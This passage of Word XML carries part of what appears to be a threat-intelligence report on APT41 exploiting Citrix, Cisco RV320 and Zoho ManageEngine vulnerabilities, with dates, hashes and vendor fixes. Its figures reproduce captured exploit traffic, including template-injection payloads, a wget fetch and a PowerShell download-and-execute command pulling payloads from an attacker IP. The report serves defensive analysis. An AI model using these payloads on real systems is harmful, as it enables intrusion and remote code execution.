                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>url=http://example.com&amp;title=[redacted]&amp;desc=[% template.new('BLOCK' = '</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>`') %]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52982688"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Figure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320B128A"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We did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the activity on February 1, where only the name of the payload ‘un’ changed.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="516E9CC8" w14:textId="77777777" w:rsidTr="00356DA3">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DD2F785" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
            <w:pPr>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POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Accept-Encoding: identity</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Content-Length: 145</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Connection: close</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Nsc_User: ../../../netscaler/portal/templates/[redacted]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>User-Agent: Python-urllib/2.7</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Nsc_Nonce: nsroot</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Host: [redacted]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>url=http://example.com&amp;title= [redacted]&amp;desc=[% template.new('BLOCK' = '</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>`') %]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B817B0D"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515A65C2"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Citrix released a </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>mitigation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FE9A9F" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="195"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Cisco Router Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297E82C1"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On February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE’s (</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>CVE-2019-1653</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>CVE-2019-1652</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) to </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>enable remote code execution on Cisco RV320 and RV325</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> small business routers and uses wget to download the specified payload.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2073"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="24154EE2" w14:textId="77777777" w:rsidTr="00356DA3">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6AFA6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GET /test/fuc</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Host: 66.42.98\.220</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>User-Agent: Wget</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60800B8B"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Figure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B47AC5D" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="225"/>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66.42.98[.]220 also hosted a file name http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5:  c0c467c8e9b2046d7053642cc9bdd57d) is ‘cat /etc/flash/etc/nk_sysconfig’, which is the command one would execute on a Cisco RV320 router to display the current configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AC2F98" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="225"/>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Cisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AAC2D2" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="1095"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6900BBA4" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="1095"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C2B7C1C" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="195"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B452FD7"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On March 5, 2020, researcher </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Steven Seeley</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, published </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>an advisory</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and released </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>proof-of-concept code</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (</w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>CVE-2020-10189)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="709A9579" w14:textId="77777777" w:rsidTr="00356DA3">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4913A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java/lang/Runtime</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2683277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getRuntime</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="108DAC37"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()Ljava/lang/Runtime;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2614855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lastRenderedPageBreak/>
              <w:t>Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Windows\Temp\install.bat')&amp;powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>C:\Windows\Temp\storesyncsvc.dll')&amp;C:\Windows\Temp\install.bat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C4CE9E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'(Ljava/lang/String;)Ljava/lang/Process;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DB6D1D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StackMapTable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="599DB791"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ysoserial/Pwner76328858520609</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12981CEE"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Lysoserial/Pwner76328858520609;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="756539F1"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 6: Contents of logger.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476CBD79"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Here we see a toolmark from the tool </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>ysoserial</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ADAC97"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In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
